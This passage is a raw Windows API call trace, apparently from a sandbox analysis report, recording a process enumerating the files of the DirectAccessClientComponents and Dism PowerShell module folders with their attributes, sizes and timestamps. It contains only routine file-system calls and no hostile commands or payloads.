cFileName="MSFT_DAClientExperienceConfiguration.types.ps1xml", cAlternateFileName="")) returned 1 [0264.769] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f30, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.cdxml", cAlternateFileName="")) returned 1 [0264.769] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x776, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.format.ps1xml", cAlternateFileName="")) returned 1 [0264.769] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.types.ps1xml", cAlternateFileName="")) returned 1 [0264.770] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.770] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.770] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", lpFilePart=0x0) returned 0x4f [0264.770] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.770] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0264.770] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.770] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.770] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents", lpFilePart=0x0) returned 0x4f [0264.770] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\", lpFilePart=0x0) returned 0x50 [0264.770] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.771] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.771] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3b30d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa3b30d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa3b30d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents.psd1", cAlternateFileName="")) returned 1 [0264.771] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f81, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.cdxml", cAlternateFileName="")) returned 1 [0264.771] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.format.ps1xml", cAlternateFileName="")) returned 1 [0264.771] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa877b6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa877b6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa877b6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2af, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DAClientExperienceConfiguration.types.ps1xml", cAlternateFileName="")) returned 1 [0264.772] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3f30, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.cdxml", cAlternateFileName="")) returned 1 [0264.772] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x776, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.format.ps1xml", cAlternateFileName="")) returned 1 [0264.772] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.types.ps1xml", cAlternateFileName="")) returned 1 [0264.772] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa6155b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa6155b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa6155b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_DASiteTableEntry.types.ps1xml", cAlternateFileName="")) returned 0 [0264.772] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0264.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0264.772] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents\\directaccessclientcomponents.psd1")) returned 0x20 [0264.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.773] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", lpFilePart=0x0) returned 0x37 [0264.773] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", lpFilePart=0x0) returned 0x38 [0264.773] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.773] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.773] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6291, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.773] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x817, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.psd1", cAlternateFileName="")) returned 1 [0264.774] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.psm1", cAlternateFileName="")) returned 1 [0264.774] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.Types.ps1xml", cAlternateFileName="")) returned 1 [0264.774] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0264.774] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13694a95, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13694a95, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Dism.PowerShell.dll", cAlternateFileName="")) returned 1 [0264.774] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13694a95, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13694a95, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Dism.PowerShell.dll", cAlternateFileName="")) returned 0 [0264.774] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0264.775] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", lpFilePart=0x0) returned 0x37 [0264.775] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", lpFilePart=0x0) returned 0x38 [0264.775] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0264.775] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.775] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6291, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.775] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x817, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.psd1", cAlternateFileName="")) returned 1 [0264.776] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.psm1", cAlternateFileName="")) returned 1 [0264.776] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.Types.ps1xml", cAlternateFileName="")) returned 1 [0264.776] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0264.776] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13694a95, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13694a95, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ee00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Dism.PowerShell.dll", cAlternateFileName="")) returned 1 [0264.776] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0264.776] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0264.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0264.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0264.776] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", lpFilePart=0x0) returned 0x37 [0264.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0264.777] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0264.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0264.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0264.777] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism", lpFilePart=0x0) returned 0x37 [0264.777] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\", lpFilePart=0x0) returned 0x38 [0264.777] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbce0 [0264.777] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0264.777] FindNextFileW (in: hFindFile=0x1a8dbce0, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13694a95, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6291, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.Format.ps1xml", cAlternateFileName="")) returned 1 [0264.778] FindNextFileW (in: hFindFile=0x1a8dbce0, 